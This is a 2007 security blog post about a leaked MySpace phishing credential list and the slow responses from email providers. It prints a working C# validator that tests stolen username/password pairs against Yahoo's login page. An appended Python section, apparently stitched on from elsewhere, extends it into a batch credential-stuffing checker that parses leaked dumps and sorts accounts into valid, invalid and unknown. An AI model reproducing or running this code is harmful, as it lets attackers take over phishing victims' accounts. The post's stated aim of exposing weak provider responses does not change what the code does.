If at first you don't succeed; call it version 1.0
Friday, 26 January 2007

Almost two weeks after I sent the first mails, and after sending two more follow-up mails asking whether there were any updates regarding this issue, I have received only one more response - from Google.
Google's response was somewhat vague:


Hello,
Thanks for your report. We apologize for any inconvenience this may have caused.
When we are notified of such issues, we investigate and take appropriate action if we find that the Gmail Terms of Use have been violated. To read the Gmail Terms of Use, please visit:
http://mail.google.com/gmail/help/terms_of_use.html.
We appreciate your concern, and thank you for taking the time to send us your comments.
Sincerely,
The Google Team


From Gmail’s terms of use:  “…Before you register for your Gmail account, you must read and agree to these Gmail Terms of Use and the following terms and conditions and policies, including any future amendments…”.

I’m not an attorney and I didn’t go to law school, but what I understand from the first line of the terms is that these “terms of use” apply only to registered Gmail users. So, if an attacker brute-forces the MySpace phishing list, finds a valid Gmail username/password and uses it, he will not be violating these terms, because he hasn’t registered that account and therefore doesn’t need to read or agree to them. I’ve sent this comment to Google.

I'm still waiting for a response from Yahoo and Microsoft.
Again, to demonstrate how easy it is to extract a valid username/password from the phishers' list, the following is a modified version of the Gmail account validator, this time for Yahoo! Mail:

using System;
using System.IO;
using System.Net;
using System.Text;

// Returns 1 if valid username/password, 0 if invalid, -1 if unknown
// (captcha, rate limiting, a changed page layout, or a transport error).
// The form fields and marker strings match Yahoo!'s login page as of January 2007.
private static int IsValidYahooMailLogin(string username, string password)
{
   HttpWebRequest request = (HttpWebRequest)WebRequest.Create("https://login.yahoo.com/config/login?");
   request.CookieContainer = new CookieContainer();
   request.Method = "POST";
   request.Referer = "https://login.yahoo.com/config/login?";
   request.ContentType = "application/x-www-form-urlencoded";
   // The credentials are percent-encoded so that '&', '=' or '+' in a
   // password cannot break the form (the first version sent them raw).
   string data = ".tries=2&.src=ym&.md5=&.hash=&.js=&.last=&promo=&.intl=us&.bypass=&" +
".partner=&.u=chn9vfp2qnpl1&.v=0&.challenge=&.yplus=&.emailCode=&pkg=" +
"&stepid=&.ev=&hasMsgr=1&.chkP=Y&.done=http%3A%2F%2Fmail.yahoo.com&.pd=ym_ver%253d0&login="
+ Uri.EscapeDataString(username) + "&passwd=" + Uri.EscapeDataString(password) + "&.save=Sign+In";
   byte[] body = Encoding.UTF8.GetBytes(data);
   request.ContentLength = body.Length;   // byte length, not character count
   string resp;
   try
   {
      using (Stream reqStream = request.GetRequestStream())
         reqStream.Write(body, 0, body.Length);
      using (HttpWebResponse response = (HttpWebResponse)request.GetResponse())
      using (StreamReader sr = new StreamReader(response.GetResponseStream()))
         resp = sr.ReadToEnd();
   }
   catch (WebException)
   {
      return -1;   // no usable answer from the server: don't guess
   }
   // A successful login answers with a JavaScript redirect to the mailbox;
   // a wrong password or a nonexistent ID answers with a fixed error text.
   if (resp.IndexOf("location.replace") > -1)
      return 1;
   if (resp.IndexOf("Invalid ID or password.") > -1 || resp.IndexOf("This ID is not yet taken.") > -1)
      return 0;
   return -1;
}
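The validator above is one instance of a general pattern: build the provider's login form, POST it, and classify the reply by a few marker strings into valid, invalid or unknown. As an added example (not code from the original post), the Python below separates that pattern into a dump parser, a form builder, a tri-state classifier and a batch runner. It reuses the marker strings from the C# version; the form field subset, the fake_yahoo_post transport, the FAKE_ACCOUNTS table and the SAMPLE_DUMP lines are constructed for the demo so that it runs offline, and a real run would replace only the transport function.

```python
from typing import Callable, Dict, List, Sequence, Tuple
from urllib.parse import parse_qs, urlencode

# Tri-state result, same convention as the C# validator on the page.
VALID, INVALID, UNKNOWN = 1, 0, -1

# Marker strings taken from the post's validator (Yahoo!'s 2007 login page).
YAHOO_SUCCESS_MARKERS = ("location.replace",)
YAHOO_FAILURE_MARKERS = ("Invalid ID or password.", "This ID is not yet taken.")
YAHOO_LOGIN_URL = "https://login.yahoo.com/config/login?"


def classify_response(body: str, success_markers: Sequence[str],
                      failure_markers: Sequence[str]) -> int:
    """Map a login response body to VALID / INVALID / UNKNOWN.

    Success markers are checked first, then failure markers. Anything else
    (captcha page, rate-limit page, redesigned form) is UNKNOWN, so a changed
    page degrades to "don't know" instead of to a wrong answer.
    """
    if any(m in body for m in success_markers):
        return VALID
    if any(m in body for m in failure_markers):
        return INVALID
    return UNKNOWN


def build_yahoo_form(username: str, password: str) -> str:
    """Build the x-www-form-urlencoded body for the login POST.

    Only a subset of the page's form fields is kept (assumption for the demo).
    urlencode percent-encodes the credentials, so '&', '=' or '+' inside a
    password cannot corrupt the form.
    """
    fields = [(".tries", "2"), (".src", "ym"), (".intl", "us"),
              (".done", "http://mail.yahoo.com"),
              ("login", username), ("passwd", password), (".save", "Sign In")]
    return urlencode(fields)


def parse_phish_dump(text: str) -> List[Tuple[str, str]]:
    """Parse 'username:password' lines as found in leaked phishing lists.

    Blank lines and lines without a separator are skipped; the split is on
    the first ':' only, so a password may itself contain ':'.
    """
    creds = []
    for line in text.splitlines():
        line = line.strip()
        if not line or ":" not in line:
            continue
        user, _, pw = line.partition(":")
        creds.append((user.strip(), pw))
    return creds


def check_credentials(creds: Sequence[Tuple[str, str]],
                      post: Callable[[str, str], str],
                      success_markers: Sequence[str],
                      failure_markers: Sequence[str]) -> Dict[int, List[str]]:
    """Run every pair through the transport and bucket usernames by result."""
    results: Dict[int, List[str]] = {VALID: [], INVALID: [], UNKNOWN: []}
    for user, pw in creds:
        body = post(YAHOO_LOGIN_URL, build_yahoo_form(user, pw))
        results[classify_response(body, success_markers, failure_markers)].append(user)
    return results


# Constructed offline stand-in for the login endpoint (not real accounts).
FAKE_ACCOUNTS = {"alice": "s3cret&pw", "bob": "hunter2"}


def fake_yahoo_post(url: str, form: str) -> str:
    """Imitate the page kinds the markers distinguish, plus a captcha page."""
    q = parse_qs(form)
    user = q.get("login", [""])[0]
    pw = q.get("passwd", [""])[0]
    if user == "captcha_user":
        return "<html>Please type the characters you see in the image</html>"
    if user not in FAKE_ACCOUNTS:
        return "<html>This ID is not yet taken.</html>"
    if FAKE_ACCOUNTS[user] == pw:
        return "<script>location.replace('http://mail.yahoo.com')</script>"
    return "<html>Invalid ID or password.</html>"


# Constructed sample dump in the 'user:password' layout of such lists.
SAMPLE_DUMP = """alice:s3cret&pw
bob:wrongpass
carol:whatever
captcha_user:xyz

malformed line
"""


def demo() -> Dict[int, List[str]]:
    return check_credentials(parse_phish_dump(SAMPLE_DUMP), fake_yahoo_post,
                             YAHOO_SUCCESS_MARKERS, YAHOO_FAILURE_MARKERS)


if __name__ == "__main__":
    buckets = demo()
    for label, code in (("valid", VALID), ("invalid", INVALID), ("unknown", UNKNOWN)):
        print(label, buckets[code])
```

The UNKNOWN bucket is the part worth keeping an eye on: once a provider starts serving captchas or throttling pages, every guess lands there, and a checker that only knows "valid or not" would silently report the whole list as invalid.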


Friday, 26 January 2007 15:15:30 UTC | .NET | Security